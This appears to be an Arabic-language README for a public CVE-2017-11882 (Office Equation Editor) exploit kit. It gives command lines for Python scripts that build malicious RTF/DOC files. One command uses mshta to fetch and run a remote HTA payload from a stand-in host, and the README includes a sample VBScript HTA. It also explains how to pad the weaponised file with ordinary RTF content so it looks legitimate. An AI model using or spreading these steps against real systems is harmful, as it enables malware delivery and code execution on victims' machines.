
استغلال لـ CVE-2017-11882 (محرر المعادلات في Microsoft Office) مع نصوص Python لتوليد ملفات RTF/DOC خبيثة وتنفيذ أوامر عشوائية أو شيل كود عبر mshta.
سكربت 43b الأصلي مأخوذ من https://github.com/embedi/CVE-2017-11882
سكربت 109b الأصلي مأخوذ من https://github.com/unamer/CVE-2017-11882/ (تحية واحترام له، الآن كود unamer أصبح قادراً على تنفيذ shellcode~)
CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/
MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
بحث: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
تحليل التصحيح: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
استغلال PoC تجريبي: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
استخدم mshta
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc
abc
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
لا يمكن أن يتجاوز طول أمر 43b 43 بايت، ولا يمكن أن يتجاوز طول أمر 109b 109 بايت
يحتوي مجلد example على ملف .rtf يستغل ثغرة CVE-2017-11882 ويقوم بتشغيل الآلة الحاسبة في النظام.
في الحقيقة، تعلمت تقنية المحتوى المخصص من محترفين آخرين، وقد كتبتها كسكربت منذ وقت طويل، ولم أكن أنوي نشرها، لكن بما أنني رأيت أن أحد الأشخاص في المجموعة قد نشرها بالفعل، لم يكن أمامي خيار سوى نشرها. الطريقة بسيطة جداً: يكفي فتح مستند rtf عادي باستخدام محرر نصوص، ونسخ كل المحتوى الموجود قبل {*\datastore، واستبدال المحتوى الموجود قبل {\object\objautlink\objupdate فقط، لذلك فإن كتابتها داخل سكربت أمر بسيط للغاية.
طريقة إضافة المحتوى المخصص، اختر أي سكربت:
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf
المحتوى المخصص موجود في ملف input.rtf.
أما بخصوص أحدث سكربت استغلال من unamer بحجم 605 بايت، فلن أقوم بتحديثه، وإذا كنت مهتماً فقم بتعديله بنفسك.